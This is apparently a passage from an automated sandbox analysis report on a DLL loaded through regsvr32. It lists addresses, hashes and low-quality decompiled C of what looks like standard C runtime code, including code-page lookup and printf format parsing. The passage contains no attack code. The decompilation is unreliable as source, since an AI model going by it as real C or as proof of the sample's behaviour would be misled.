                                                                                0x7ffa52474f20
                                                                                0x7ffa52474f25
                                                                                0x7ffa52474f2a
                                                                                0x7ffa52474f2f
                                                                                0x7ffa52474f55
                                                                                0x7ffa52474f59
                                                                                0x7ffa52474f5e
                                                                                0x7ffa52474f63
                                                                                0x7ffa52474f6e
                                                                                0x7ffa52474f81
                                                                                0x7ffa52474f88
                                                                                0x7ffa52474f99
                                                                                0x7ffa52474fa4
                                                                                0x7ffa52474fa6
                                                                                0x7ffa52474fb5
                                                                                0x7ffa52474fb7
                                                                                0x7ffa52474fbe
                                                                                0x7ffa52474fcf
                                                                                0x7ffa52474fda
                                                                                0x7ffa52474fde
                                                                                0x7ffa52474fef
                                                                                0x7ffa52474ffc
                                                                                0x7ffa52474ffe
                                                                                0x7ffa52475003
                                                                                0x7ffa52475008
                                                                                0x7ffa5247502e
                                                                                0x7ffa52475031
                                                                                0x7ffa52475036
                                                                                0x7ffa52475038
                                                                                0x7ffa52475047
                                                                                0x7ffa5247504d
                                                                                0x7ffa5247506f
                                                                                0x7ffa52475080
                                                                                0x7ffa5247508d
                                                                                0x7ffa5247508f
                                                                                0x7ffa52475094
                                                                                0x7ffa52475099
                                                                                0x7ffa524750bf
                                                                                0x7ffa524750c2
                                                                                0x7ffa524750c7
                                                                                0x7ffa524750c9
                                                                                0x7ffa524750d2
                                                                                0x7ffa524750ef
                                                                                0x7ffa524750f4
                                                                                0x7ffa524750fa
                                                                                0x7ffa524750fe
                                                                                0x7ffa52475103
                                                                                0x7ffa5247510f
                                                                                0x7ffa52475111
                                                                                0x7ffa5247511c
                                                                                0x7ffa5247512f
                                                                                0x7ffa52475136
                                                                                0x7ffa52475143
                                                                                0x7ffa52475145
                                                                                0x7ffa5247514a
                                                                                0x7ffa52475170

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                                                • String ID:
                                                                                • API String ID: 2452617236-0
                                                                                • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                • Instruction ID: 9342b333d24315bc0d3f5b63d50111b35f7467fa65d74eb61311a179df709a19
                                                                                • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                                • Instruction Fuzzy Hash: 5661FC32A0DA8186DA70DB54E45036AB3B0FBC5B49F188535EA9D87B9ADF7CE4418B40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA52469F20 Relevance: 9.0, APIs: 6, Instructions: 46COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 27%
                                                                                			E00007FFA7FFA52469F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
				long long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				char _v64;
				long long _v72;
				intOrPtr _t29;
				intOrPtr* _t41;

				_t41 = __rax;
				_a8 = __ecx;
				_v16 = 0xfffffffe;
				_v72 = 0;
				0x524666b0();
				 *0x5248cd68 = 0;
				if (_a8 != 0xfffffffe) goto 0x52469f81;
				 *0x5248cd68 = 1;
				_v32 = GetOEMCP();
				E00007FFA7FFA52466800( &_v64);
				goto 0x52469fe3;
				if (_a8 != 0xfffffffd) goto 0x52469fae;
				 *0x5248cd68 = 1;
				_v28 = GetACP();
				E00007FFA7FFA52466800( &_v64);
				_t29 = _v28;
				goto 0x52469fe3;
				if (_a8 != 0xfffffffc) goto 0x52469fe3;
				 *0x5248cd68 = 1;
				E00007FFA7FFA52466840(_t29,  &_v64);
				_v24 =  *((intOrPtr*)( *_t41 + 4));
				E00007FFA7FFA52466800( &_v64);
				goto 0x52469ff9;
				_v20 = _a8;
				E00007FFA7FFA52466800( &_v64);
				return _v20;
			}












                                                                                0x7ffa52469f20
                                                                                0x7ffa52469f20
                                                                                0x7ffa52469f28
                                                                                0x7ffa52469f31
                                                                                0x7ffa52469f44
                                                                                0x7ffa52469f4a
                                                                                0x7ffa52469f59
                                                                                0x7ffa52469f5b
                                                                                0x7ffa52469f6b
                                                                                0x7ffa52469f74
                                                                                0x7ffa52469f7f
                                                                                0x7ffa52469f86
                                                                                0x7ffa52469f88
                                                                                0x7ffa52469f98
                                                                                0x7ffa52469fa1
                                                                                0x7ffa52469fa6
                                                                                0x7ffa52469fac
                                                                                0x7ffa52469fb3
                                                                                0x7ffa52469fb5
                                                                                0x7ffa52469fc4
                                                                                0x7ffa52469fcf
                                                                                0x7ffa52469fd8
                                                                                0x7ffa52469fe1
                                                                                0x7ffa52469fe7
                                                                                0x7ffa52469ff0
                                                                                0x7ffa52469ffd

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_
                                                                                • String ID:
                                                                                • API String ID: 1901436342-0
                                                                                • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                • Instruction ID: 0bf3028c2791ec8c58b77183db2055c904c36c40b8bd4f1941e18b00017198e7
                                                                                • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                                • Instruction Fuzzy Hash: F721FF3290C5419AE7249F24E88016ABBF0EB85764F148335E2AD466E9DFBCE545CF80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247809F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter
                                                                                • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                                                • API String ID: 2123368286-552404435
                                                                                • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                • Instruction ID: 444f3bd627df41f77c8a6645bd4a7649f5abd14a896ee6dd16e93d2959bb637d
                                                                                • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                                • Instruction Fuzzy Hash: 8751F63190CBC585E6708B14E84436A63F0FB96764F188635D6BD47BE8DFBCE4469B01
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DC6B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00007FFA7FFA5247DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0x5247dd05;
				if (_a1404 == 0x23) goto 0x5247dd12;
				if (_a1404 == 0x2b) goto 0x5247dcf8;
				if (_a1404 == 0x2d) goto 0x5247dceb;
				if (_a1404 == 0x30) goto 0x5247dd20;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0x5247dd2b;
				asm("bts eax, 0x7");
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
				_t204 =  &_a1560;
				_a88 = E00007FFA7FFA52471E40(_t204);
				if (_a88 >= 0) goto 0x5247dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247dd83;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
				_t205 =  &_a1560;
				_a116 = E00007FFA7FFA52471E40(_t205);
				if (_a116 >= 0) goto 0x5247ddc2;
				_a116 = 0xffffffff;
				goto 0x5247dddb;
				_a116 = _t184 + _t205 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}






                                                                                0x7ffa5247dc6b
                                                                                0x7ffa5247dc77
                                                                                0x7ffa5247dc7f
                                                                                0x7ffa5247dc87
                                                                                0x7ffa5247dc8b
                                                                                0x7ffa5247dc93
                                                                                0x7ffa5247dc9b
                                                                                0x7ffa5247dcb0
                                                                                0x7ffa5247dcbf
                                                                                0x7ffa5247dcc9
                                                                                0x7ffa5247dcd3
                                                                                0x7ffa5247dcdd
                                                                                0x7ffa5247dce7
                                                                                0x7ffa5247dce9
                                                                                0x7ffa5247dcf2
                                                                                0x7ffa5247dcf6
                                                                                0x7ffa5247dcff
                                                                                0x7ffa5247dd03
                                                                                0x7ffa5247dd0c
                                                                                0x7ffa5247dd10
                                                                                0x7ffa5247dd16
                                                                                0x7ffa5247dd1e
                                                                                0x7ffa5247dd27
                                                                                0x7ffa5247dd3b
                                                                                0x7ffa5247dd3d
                                                                                0x7ffa5247dd4a
                                                                                0x7ffa5247dd53
                                                                                0x7ffa5247dd5c
                                                                                0x7ffa5247dd66
                                                                                0x7ffa5247dd6a
                                                                                0x7ffa5247dd7f
                                                                                0x7ffa5247dd88
                                                                                0x7ffa5247dda0
                                                                                0x7ffa5247dda2
                                                                                0x7ffa5247ddaf
                                                                                0x7ffa5247ddb8
                                                                                0x7ffa5247ddba
                                                                                0x7ffa5247ddc2
                                                                                0x7ffa5247ddd7
                                                                                0x7ffa5247dde8
                                                                                0x7ffa5247ddf7
                                                                                0x7ffa5247de01
                                                                                0x7ffa5247de0f
                                                                                0x7ffa5247de19
                                                                                0x7ffa5247de1f
                                                                                0x7ffa5247de32
                                                                                0x7ffa5247de40
                                                                                0x7ffa5247de4c
                                                                                0x7ffa5247de54
                                                                                0x7ffa5247de5d
                                                                                0x7ffa5247de61
                                                                                0x7ffa5247de6a
                                                                                0x7ffa5247de80
                                                                                0x7ffa5247de91
                                                                                0x7ffa5247de9f
                                                                                0x7ffa5247deab
                                                                                0x7ffa5247deb3
                                                                                0x7ffa5247dec6
                                                                                0x7ffa5247ded7
                                                                                0x7ffa5247dee5
                                                                                0x7ffa5247def1
                                                                                0x7ffa5247def9
                                                                                0x7ffa5247df09
                                                                                0x7ffa5247df19
                                                                                0x7ffa5247df29
                                                                                0x7ffa5247df39
                                                                                0x7ffa5247df49
                                                                                0x7ffa5247df59
                                                                                0x7ffa5247df5b
                                                                                0x7ffa5247df5d
                                                                                0x7ffa5247df68
                                                                                0x7ffa5247df6d
                                                                                0x7ffa5247df76
                                                                                0x7ffa5247df7a
                                                                                0x7ffa5247df80
                                                                                0x7ffa5247df95
                                                                                0x7ffa5247dfa6
                                                                                0x7ffa5247dfb5
                                                                                0x7ffa5247dfdc

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-734865713
                                                                                • Opcode ID: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                • Instruction ID: aa6985e6bb7ea6890fab7692b83db90917be213b6db5baa3c8709ab291cef098
                                                                                • Opcode Fuzzy Hash: d839b4f8492d9702b4695783724771f139c243a43186ab9091008b35e86c7283
                                                                                • Instruction Fuzzy Hash: AF410DB291C6C1CAE7708B24E8403AAB7F0F785345F488135E6AD87A99DBBCD441CF14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247BCBD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00007FFA7FFA5247BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0x5247bd57;
				if (_a968 == 0x23) goto 0x5247bd64;
				if (_a968 == 0x2b) goto 0x5247bd4a;
				if (_a968 == 0x2d) goto 0x5247bd3d;
				if (_a968 == 0x30) goto 0x5247bd72;
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0x5247bd7d;
				asm("bts eax, 0x7");
				goto 0x5247bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0x5247bdbe;
				_t204 =  &_a1112;
				_a88 = E00007FFA7FFA52471E40(_t204);
				if (_a88 >= 0) goto 0x5247bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247bdd5;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0x5247be16;
				_t205 =  &_a1112;
				_a116 = E00007FFA7FFA52471E40(_t205);
				if (_a116 >= 0) goto 0x5247be14;
				_a116 = 0xffffffff;
				goto 0x5247be2d;
				_a116 = _t184 + _t205 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0x5247beb7;
				if (_a972 == 0x68) goto 0x5247bfc0;
				if (_a972 == 0x6c) goto 0x5247be76;
				if (_a972 == 0x77) goto 0x5247bfcd;
				goto 0x5247bfd9;
				if ( *_a1096 != 0x6c) goto 0x5247bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0x5247beb2;
				_a80 = _a80 | 0x00000010;
				goto 0x5247bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0x5247bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0x5247bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 != 0x33) goto 0x5247bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0x5247bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0x5247bfbe;
				if ( *_a1096 == 0x64) goto 0x5247bfac;
				if ( *_a1096 == 0x69) goto 0x5247bfac;
				if ( *_a1096 == 0x6f) goto 0x5247bfac;
				if ( *_a1096 == 0x75) goto 0x5247bfac;
				if ( *_a1096 == 0x78) goto 0x5247bfac;
				if ( *_a1096 != 0x58) goto 0x5247bfae;
				goto 0x5247bfbe;
				_a704 = 0;
				goto E00007FFA7FFA5247BB66;
				goto 0x5247bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0x5247bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0x5247ca31;
				goto __rax;
			}






                                                                                0x7ffa5247bcbd
                                                                                0x7ffa5247bcc9
                                                                                0x7ffa5247bcd1
                                                                                0x7ffa5247bcd9
                                                                                0x7ffa5247bcdd
                                                                                0x7ffa5247bce5
                                                                                0x7ffa5247bced
                                                                                0x7ffa5247bd02
                                                                                0x7ffa5247bd11
                                                                                0x7ffa5247bd1b
                                                                                0x7ffa5247bd25
                                                                                0x7ffa5247bd2f
                                                                                0x7ffa5247bd39
                                                                                0x7ffa5247bd3b
                                                                                0x7ffa5247bd44
                                                                                0x7ffa5247bd48
                                                                                0x7ffa5247bd51
                                                                                0x7ffa5247bd55
                                                                                0x7ffa5247bd5e
                                                                                0x7ffa5247bd62
                                                                                0x7ffa5247bd68
                                                                                0x7ffa5247bd70
                                                                                0x7ffa5247bd79
                                                                                0x7ffa5247bd8d
                                                                                0x7ffa5247bd8f
                                                                                0x7ffa5247bd9c
                                                                                0x7ffa5247bda5
                                                                                0x7ffa5247bdae
                                                                                0x7ffa5247bdb8
                                                                                0x7ffa5247bdbc
                                                                                0x7ffa5247bdd1
                                                                                0x7ffa5247bdda
                                                                                0x7ffa5247bdf2
                                                                                0x7ffa5247bdf4
                                                                                0x7ffa5247be01
                                                                                0x7ffa5247be0a
                                                                                0x7ffa5247be0c
                                                                                0x7ffa5247be14
                                                                                0x7ffa5247be29
                                                                                0x7ffa5247be3a
                                                                                0x7ffa5247be49
                                                                                0x7ffa5247be53
                                                                                0x7ffa5247be61
                                                                                0x7ffa5247be6b
                                                                                0x7ffa5247be71
                                                                                0x7ffa5247be84
                                                                                0x7ffa5247be91
                                                                                0x7ffa5247be9d
                                                                                0x7ffa5247bea5
                                                                                0x7ffa5247beae
                                                                                0x7ffa5247beb2
                                                                                0x7ffa5247bebb
                                                                                0x7ffa5247bed1
                                                                                0x7ffa5247bee2
                                                                                0x7ffa5247bef0
                                                                                0x7ffa5247befc
                                                                                0x7ffa5247bf04
                                                                                0x7ffa5247bf17
                                                                                0x7ffa5247bf28
                                                                                0x7ffa5247bf36
                                                                                0x7ffa5247bf42
                                                                                0x7ffa5247bf4a
                                                                                0x7ffa5247bf5a
                                                                                0x7ffa5247bf6a
                                                                                0x7ffa5247bf7a
                                                                                0x7ffa5247bf8a
                                                                                0x7ffa5247bf9a
                                                                                0x7ffa5247bfaa
                                                                                0x7ffa5247bfac
                                                                                0x7ffa5247bfae
                                                                                0x7ffa5247bfb9
                                                                                0x7ffa5247bfbe
                                                                                0x7ffa5247bfc7
                                                                                0x7ffa5247bfcb
                                                                                0x7ffa5247bfd1
                                                                                0x7ffa5247bfe6
                                                                                0x7ffa5247bff7
                                                                                0x7ffa5247c006
                                                                                0x7ffa5247c02d

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                • API String ID: 2192614184-192189897
                                                                                • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                • Instruction ID: 04ebf31ffc9ba23a685a9ff9eead22ddd493a6f644ec57c09243ffcd36a6b1d4
                                                                                • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                                • Instruction Fuzzy Hash: B1411B7291C6C68AE370DB24E8543AEB7F4E786314F484135D6AC86A9DDBBCE541CF00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00007FFA5247DC41 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E00007FFA7FFA5247DC41(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, char _a1200, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, intOrPtr _a1536, signed short* _a1544, char _a1560) {
				void* _t190;
				char* _t210;
				char* _t211;

				_a76 = 1;
				E00007FFA7FFA5247EE40(_a1208 & 0x0000ffff, _a1536,  &_a1200);
				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a1404 = _a1208 & 0x0000ffff;
				if (_a1404 == 0x20) goto 0x5247dd05;
				if (_a1404 == 0x23) goto 0x5247dd12;
				if (_a1404 == 0x2b) goto 0x5247dcf8;
				if (_a1404 == 0x2d) goto 0x5247dceb;
				if (_a1404 == 0x30) goto 0x5247dd20;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000004;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000001;
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000002;
				goto 0x5247dd2b;
				asm("bts eax, 0x7");
				goto 0x5247dd2b;
				_a80 = _a80 | 0x00000008;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247dd6c;
				_t210 =  &_a1560;
				_a88 = E00007FFA7FFA52471E40(_t210);
				if (_a88 >= 0) goto 0x5247dd6a;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0x5247dd83;
				_a88 = _t190 + _t210 - 0x30;
				_a116 = 0;
				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0x5247ddc4;
				_t211 =  &_a1560;
				_a116 = E00007FFA7FFA52471E40(_t211);
				if (_a116 >= 0) goto 0x5247ddc2;
				_a116 = 0xffffffff;
				goto 0x5247dddb;
				_a116 = _t190 + _t211 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0x5247de66;
				if (_a1408 == 0x68) goto 0x5247df6f;
				if (_a1408 == 0x6c) goto 0x5247de24;
				if (_a1408 == 0x77) goto 0x5247df7c;
				goto 0x5247df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0x5247de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0x5247de61;
				_a80 = _a80 | 0x00000010;
				goto 0x5247df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0x5247deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0x5247deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0x5247defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0x5247defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0x5247df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0x5247df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0x5247df5d;
				goto 0x5247df6d;
				_a1216 = 0;
				goto E00007FFA7FFA5247DC41;
				goto 0x5247df88;
				_a80 = _a80 | 0x00000020;
				goto 0x5247df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0x5247ea2a;
				goto __rax;
			}






                                                                                0x7ffa5247dc41
                                                                                0x7ffa5247dc61
                                                                                0x7ffa5247dc6b
                                                                                0x7ffa5247dc77
                                                                                0x7ffa5247dc7f
                                                                                0x7ffa5247dc87
                                                                                0x7ffa5247dc8b
                                                                                0x7ffa5247dc93
                                                                                0x7ffa5247dc9b
                                                                                0x7ffa5247dcb0
                                                                                0x7ffa5247dcbf
                                                                                0x7ffa5247dcc9
                                                                                0x7ffa5247dcd3
                                                                                0x7ffa5247dcdd
                                                                                0x7ffa5247dce7
                                                                                0x7ffa5247dce9
                                                                                0x7ffa5247dcf2
                                                                                0x7ffa5247dcf6
                                                                                0x7ffa5247dcff
                                                                                0x7ffa5247dd03
                                                                                0x7ffa5247dd0c
                                                                                0x7ffa5247dd10
                                                                                0x7ffa5247dd16
                                                                                0x7ffa5247dd1e
                                                                                0x7ffa5247dd27
                                                                                0x7ffa5247dd3b
                                                                                0x7ffa5247dd3d
                                                                                0x7ffa5247dd4a
                                                                                0x7ffa5247dd53
                                                                                0x7ffa5247dd5c
                                                                                0x7ffa5247dd66
                                                                                0x7ffa5247dd6a
                                                                                0x7ffa5247dd7f
                                                                                0x7ffa5247dd88
                                                                                0x7ffa5247dda0
                                                                                0x7ffa5247dda2
                                                                                0x7ffa5247ddaf
                                                                                0x7ffa5247ddb8
                                                                                0x7ffa5247ddba
                                                                                0x7ffa5247ddc2
